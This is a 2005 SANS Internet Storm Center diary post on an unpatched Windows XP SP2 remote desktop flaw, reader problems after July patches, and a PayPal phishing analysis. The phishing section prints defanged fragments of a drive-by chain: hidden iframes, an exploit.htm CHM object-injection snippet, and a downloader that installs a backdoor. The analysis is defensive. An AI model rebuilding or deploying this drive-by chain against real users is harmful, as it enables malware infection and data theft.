Threat Level: green Handler on Duty: Tom Webb

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-07-14 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Update: New Windows XP SP2 vulnerability; MS Patches reports; Bad, Bad Spam...

Published: 2005-07-14
Last Updated: 2005-07-15 04:09:46 UTC
by Pedro Bueno (Version: 1)
0 comment(s)

Update: New Windows XP SP2 vulnerability



badpack3t announced the discovery of a so far unpatched vulnerability in
Windows XP SP2. The vulnerability in due to a flaw in the remote desktop assistant. This service is NOT FIREWALLED in XP SP2's default firewall configuration.

badpack3t was able to cause a blue screen. However, there is a chance that
this could be used to execute code remotely.

RDP uses port 3389 TCP. In one MSFT , 3389 UDP is mentioned, but we could not verify that RDP listens on 3389 UDP.

Our sensors did see a slight increase in port 3389 TCP scanning starting about two weeks ago. The increase is small, and somewhat consistent with a small number of new scanners.

Other references to this issue:

http://secunia.com/advisories/16071/

https://www.immunitysec.com/pipermail/dailydave/2005-July/002185.html

MS Patches reports





Yesterday, Tom asked for reports about MS July patches. Bellow, is a summary of the reports received, plus some opinions about the W2k Security Rollup for SP4. Thank you all that sent the reports!






* Citrix problems with W2k security rollup patches.






A reader reported that "...After applying the update on two separate servers, authenticated users connecting to the servers through a Windows 2000 Server VPN connection are unable to run published applications. After removing the security rollup, full functionality is restored."

After some email exchange, we found that Citrix made available a KB article about this. It is the Document ID: CTX107051. The reader told that he will try the workaround.






* Panda AV problems after the patches were applied.






A reader reported that "...After applying the patches, some components (either the firewall or protection against unknown threats) on Panda Platinum 2005 Internet Security (9.02.01) stopped working.

This happened on my Win2000 laptop (fully patched) and on several WinXP Pro boxes. The solution was to completely uninstall Panda & then re-install it."




* Problems with v6 downloading patches...






A reader reported that when visiting the Windows Updated website, a suggestion to upgrade the Windows Update Agent was prompted to the user. He did that and after that he couldn't connect to any update server. The solution: "...I found that re-installing Microsoft XML parser 3.0 SP4 fixed the issue.
Going to v4.windowsupdate.microsoft.com generated an error, but provided the info on fixing this. This fix allowed for a reinstall of Windows Update Agent."







* Another reader reported a crash of explorer.exe on trying to view a video folder. It happened after he installed MS05-036.






Bad, Bad Phishing/Spam...









We received today a report of a PayPal phishing. While all links on the html were from PayPay, another one wasn't. The link is the one bellow:

http : //www.onlinepaymentspaypaleio[ SNIP ]we.[DOMAIN].org//Trants/Bin/kdejidiuehyguyuwdheoirejfrufhrfyrguf
rfgruhrfuherif/oudiheiudhedygdueydguwedyehdieudgwuydew/
doiejduhdiudhediwuedhwei.html



Quite strange domain, huh? What about a html file called doiejduhdiudhediwuedhwei.html ?




::doiejduhdiudhediwuedhwei.html::


#html#




#body#



#iframe src="http : //www.i47324876348731[ SNIP ]45237463254734823746823467.biz" width=0 height=0 bord
er=0##/iframe#



#/body#


#/html#



Another very interesting domain...

This would load the iframe to the domain above. The content of the index.html file is bellow:






::index.html::





#html#

#head#

#/head#

#body#

#iframe width=0 border=0 height=0 src="exploit.htm"##/iframe#

#iframe width=0 border=0 height=0 src="ani.html"##/iframe#

#iframe width=0 border=0 height=0 src="new/index.html"##/iframe#

#/body#

#/html#


More iframes...what a surprise...

The content?(PS. I had to change some stuff bellow, because it was triggering some AV)


#textarea id="code" style="display:none;"#
<object data="&#109;[SNIP]:[SNIP]!${PATH}/exploit.chm::/exploit.htm" type="text/x-scriptlet"##/object#

#/textarea#



#script language="javascript"#

document//write(code//value//replace(/\${PATH}/g,location//href//
substring(0,location//href//indexOf('exploit.htm'))));

#/script#


The new/index.html will try to download a file called loader.exe, a DOWNloader.exe trojan...:)



This loader.exe will try to download a file called f0001.exe.


This one will create the files:

* Creates file C:\WINDOWS\SYSTEM\winldra.exe.

* Creates file C:\WINDOWS\netdx.dat.

* Creates file C:\WINDOWS\dvpd.dll.

* Creates file C:\WINDOWS\TEMP\fe43e701.htm.

among other keys on Registry...



It will also open a backdoor on port 9125.

This kind of virus usually opens a proxy, ftp server and has capabilities of keyloggers...



Bad thing...as I write this, just detected by 3 of the 22 AV on VirusTotal yet...


___________________________________________________________________________

Handler on Duty: Pedro Bueno ( pbueno \#AT\# isc.sans.org )
Keywords:
0 comment(s)
Diary Archives